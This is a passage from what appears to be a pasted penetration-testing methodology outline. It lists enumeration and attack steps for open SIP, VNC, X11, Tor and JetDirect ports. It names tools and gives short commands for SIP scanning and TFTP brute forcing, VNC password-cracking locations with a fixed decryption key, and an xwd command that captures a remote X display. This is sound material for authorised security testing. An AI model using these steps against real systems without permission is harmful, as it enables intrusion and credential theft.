  720. ® Evaluate mis-configured parameters
  721. □ Manual sql input of previously reported vulnerabilties
  722. ® Advanced SQL Injection in SQL Server
  723. ® More Advanced SQL Injection
  724. § NGS Squirrel for Sybase
  725. • SIP Port 5060 open
  726. ○ SIP Enumeration
  727. § netcat
  728. □ nc IP_Address Port
  729. § sipflanker
  730. □ python sipflanker.py 192.168.1-254
  731. § Sipscan
  732. § smap
  733. □ smap IP_Address/Subnet_Mask
  734. □ smap -o IP_Address/Subnet_Mask
  735. □ smap -l IP_Address
  736. ○ SIP Packet Crafting etc.
  737. § sipsak
  738. □ Tracing paths: - sipsak -T -s sip:usernaem@domain
  739. □ Options request:- sipsak -vv -s sip:username@domain
  740. □ Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
  741. § siprogue
  742. ○ SIP Vulnerability Scanning/ Brute Force
  743. § tftp bruteforcer
  744. □ Default dictionary file
  745. □ ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
  746. § VoIPaudit
  747. § SiVuS
  748. ○ Examine Configuration Files
  749. § SIPDefault.cnf
  750. § asterisk.conf
  751. § sip.conf
  752. § phone.conf
  753. § sip_notify.conf
  754. § <Ethernet address>.cfg
  755. § 000000000000.cfg
  756. § phone1.cfg
  757. § sip.cfg etc. etc.
  758. • VNC port 5900^ open
  759. ○ VNC Enumeration
  760. § Scans
  761. □ 5900^ for direct access.5800 for HTTP access.
  762. ○ VNC Brute Force
  763. § Password Attacks
  764. □ Remote
  765. ® Password Guess
  766. ◊ vncrack
  767. ® Password Crack
  768. ◊ vncrack
  769. ◊ Packet Capture
  770. } Phosshttp://www.phenoelit.de/phoss
  771. □ Local
  772. ® Registry Locations
  773. ◊ \HKEY_CURRENT_USER\Software\ORL\WinVNC3
  774. ◊ \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
  775. ® Decryption Key
  776. ◊ 0x238210763578887
  777. ○ Exmine Configuration Files
  778. § .vnc
  779. § /etc/vnc/config
  780. § $HOME/.vnc/config
  781. § /etc/sysconfig/vncservers
  782. § /etc/vnc.conf
  783. • X11 port 6000^ open
  784. ○ X11 Enumeration
  785. § List open windows
  786. § Authentication Method
  787. □ Xauth
  788. □ Xhost
  789. ○ X11 Exploitation
  790. § xwd
  791. □ xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
  792. § Keystrokes
  793. □ Received
  794. □ Transmitted
  795. § Screenshots
  796. § xhost +
  797. ○ Examine Configuration Files
  798. § /etc/Xn.hosts
  799. § /usr/lib/X11/xdm
  800. □ Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
  801. § /usr/lib/X11/xdm/xsession
  802. § /usr/lib/X11/xdm/xsession-remote
  803. § /usr/lib/X11/xdm/xsession.0
  804. § /usr/lib/X11/xdm/xdm-config
  805. □ DisplayManager*authorize:on
  806. • Tor Port 9001, 9030 open
  807. ○ Tor Node Checker
  808. § Ip Pages
  809. § Kewlio.net
  810. ○ nmap NSE script
  811. • Jet Direct 9100 open
  812. ○ hijetta
Add Comment
Please, Sign In to add comment